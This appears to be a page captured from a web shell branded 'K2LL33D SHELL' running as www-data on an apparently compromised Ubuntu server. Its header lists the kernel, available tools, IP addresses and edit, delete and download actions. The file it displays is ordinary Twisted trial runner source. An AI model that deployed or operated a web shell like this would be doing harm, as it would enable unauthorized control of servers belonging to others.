K2LL33D SHELL

 Apache/2.4.7 (Ubuntu)
 Linux sman1baleendah 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 safemode : OFF
 MySQL: ON | Perl: ON | cURL: OFF | WGet: ON
  >  / usr / lib / python2.7 / dist-packages / twisted / trial / _dist /
server ip : 172.67.156.115

your ip : 108.162.216.94

H O M E


Filename/usr/lib/python2.7/dist-packages/twisted/trial/_dist/disttrial.py
Size8.5 kb
Permissionrw-r--r--
Ownerroot : root
Create time27-Apr-2025 09:56
Last modified30-May-2013 09:52
Last accessed07-Jul-2025 07:27
Actionsedit | rename | delete | download (gzip)
Viewtext | code | image
# -*- test-case-name: twisted.trial._dist.test.test_disttrial -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

"""
This module containts the trial distributed runner, the management class
responsible for coordinating all of trial's behavior at the highest level.

@since: 12.3
"""

import os
import sys

from twisted.python.filepath import FilePath
from twisted.python.modules import theSystemPath
from twisted.internet.defer import DeferredList
from twisted.internet.task import cooperate

from twisted.trial.util import _unusedTestDirectory
from twisted.trial.unittest import _iterateTests
from twisted.trial._dist.worker import LocalWorker, LocalWorkerAMP
from twisted.trial._dist.distreporter import DistReporter
from twisted.trial.reporter import UncleanWarningsReporterWrapper
from twisted.trial._dist import _WORKER_AMP_STDIN, _WORKER_AMP_STDOUT



class DistTrialRunner(object):
"""
A specialized runner for distributed trial. The runner launches a number of
local worker processes which will run tests.

@ivar _workerNumber: the number of workers to be spawned.
@type _workerNumber: C{int}

@ivar _stream: stream which the reporter will use.

@ivar _reporterFactory: the reporter class to be used.
"""
_distReporterFactory = DistReporter

def _makeResult(self):
"""
Make reporter factory, and wrap it with a L{DistReporter}.
"""
reporter = self._reporterFactory(self._stream, self._tbformat,
realtime=self._rterrors)
if self._uncleanWarnings:
reporter = UncleanWarningsReporterWrapper(reporter)
return self._distReporterFactory(reporter)


def __init__(self, reporterFactory, workerNumber, workerArguments,
stream=None,
tracebackFormat='default',
realTimeErrors=False,
uncleanWarnings=False,
logfile='test.log',
workingDirectory='_trial_temp'):
self._workerNumber = workerNumber
self._workerArguments = workerArguments
self._reporterFactory = reporterFactory
if stream is None:
stream = sys.stdout
self._stream = stream
self._tbformat = tracebackFormat
self._rterrors = realTimeErrors
self._uncleanWarnings = uncleanWarnings
self._result = None
self._workingDirectory = workingDirectory
self._logFile = logfile
self._logFileObserver = None
self._logFileObject = None
self._logWarnings = False


def writeResults(self, result):
"""
Write test run final outcome to result.

@param result: A C{TestResult} which will print errors and the summary.
"""
result.done()


def createLocalWorkers(self, protocols, workingDirectory):
"""
Create local worker protocol instances and return them.

@param protocols: An iterable of L{LocalWorkerAMP} instances.

@param workingDirectory: The base path in which we should run the
workers.
@type workingDirectory: C{str}

@return: A list of C{quantity} C{LocalWorker} instances.
"""
return [LocalWorker(protocol,
os.path.join(workingDirectory, str(x)),
self._logFile)
for x, protocol in enumerate(protocols)]


def launchWorkerProcesses(self, spawner, protocols, arguments):
"""
Spawn processes from a list of process protocols.

@param spawner: A C{IReactorProcess.spawnProcess} implementation.

@param protocols: An iterable of C{ProcessProtocol} instances.

@param arguments: Extra arguments passed to the processes.
"""
workertrialPath = theSystemPath[
'twisted.trial._dist.workertrial'].filePath.path
childFDs = {0: 'w', 1: 'r', 2: 'r', _WORKER_AMP_STDIN: 'w',
_WORKER_AMP_STDOUT: 'r'}
environ = os.environ.copy()
# Add a environment variable containing the raw sys.path, to be used by
# subprocesses to make sure it's identical to the parent. See
# workertrial._setupPath.
environ['TRIAL_PYTHONPATH'] = os.pathsep.join(sys.path)
for worker in protocols:
args = [sys.executable, workertrialPath]
args.extend(arguments)
spawner(worker, sys.executable, args=args, childFDs=childFDs,
env=environ)


def _driveWorker(self, worker, result, testCases, cooperate):
"""
Drive a L{LocalWorkerAMP} instance, iterating the tests and calling
C{run} for every one of them.

@param worker: The L{LocalWorkerAMP} to drive.

@param result: The global L{DistReporter} instance.

@param testCases: The global list of tests to iterate.

@param cooperate: The cooperate function to use, to be customized in
tests.
@type cooperate: C{function}

@return: A C{Deferred} firing when all the tests are finished.
"""

def resultErrback(error, case):
result.original.addFailure(case, error)
return error

def task(case):
d = worker.run(case, result)
d.addErrback(resultErrback, case)
return d

return cooperate(task(case) for case in testCases).whenDone()


def run(self, suite, reactor=None, cooperate=cooperate,
untilFailure=False):
"""
Spawn local worker processes and load tests. After that, run them.

@param suite: A tests suite to be run.

@param reactor: The reactor to use, to be customized in tests.
@type reactor: A provider of
L{twisted.internet.interfaces.IReactorProcess}

@param cooperate: The cooperate function to use, to be customized in
tests.
@type cooperate: C{function}

@param untilFailure: If C{True}, continue to run the tests until they
fail.
@type untilFailure: C{bool}.

@return: The test result.
@rtype: L{DistReporter}
"""
if reactor is None:
from twisted.internet import reactor
result = self._makeResult()
count = suite.countTestCases()
self._stream.write("Running %d tests.\n" % (count,))

if not count:
# Take a shortcut if there is no test
suite.run(result.original)
self.writeResults(result)
return result

testDir, testDirLock = _unusedTestDirectory(
FilePath(self._workingDirectory))
workerNumber = min(count, self._workerNumber)
ampWorkers = [LocalWorkerAMP() for x in xrange(workerNumber)]
workers = self.createLocalWorkers(ampWorkers, testDir.path)
processEndDeferreds = [worker.endDeferred for worker in workers]
self.launchWorkerProcesses(reactor.spawnProcess, workers,
self._workerArguments)

def runTests():
testCases = iter(list(_iterateTests(suite)))

workerDeferreds = []
for worker in ampWorkers:
workerDeferreds.append(
self._driveWorker(worker, result, testCases,
cooperate=cooperate))
return DeferredList(workerDeferreds, consumeErrors=True,
fireOnOneErrback=True)

stopping = []

def nextRun(ign):
self.writeResults(result)
if not untilFailure:
return
if not result.wasSuccessful():
return
d = runTests()
return d.addCallback(nextRun)

def stop(ign):
testDirLock.unlock()
if not stopping:
stopping.append(None)
reactor.stop()

def beforeShutDown():
if not stopping:
stopping.append(None)
d = DeferredList(processEndDeferreds, consumeErrors=True)
return d.addCallback(continueShutdown)

def continueShutdown(ign):
self.writeResults(result)
return ign

d = runTests()
d.addCallback(nextRun)
d.addBoth(stop)

reactor.addSystemEventTrigger('before', 'shutdown', beforeShutDown)
reactor.run()

return result


def runUntilFailure(self, suite):
"""
Run the tests with local worker processes until they fail.

@param suite: A tests suite to be run.
"""
return self.run(suite, untilFailure=True)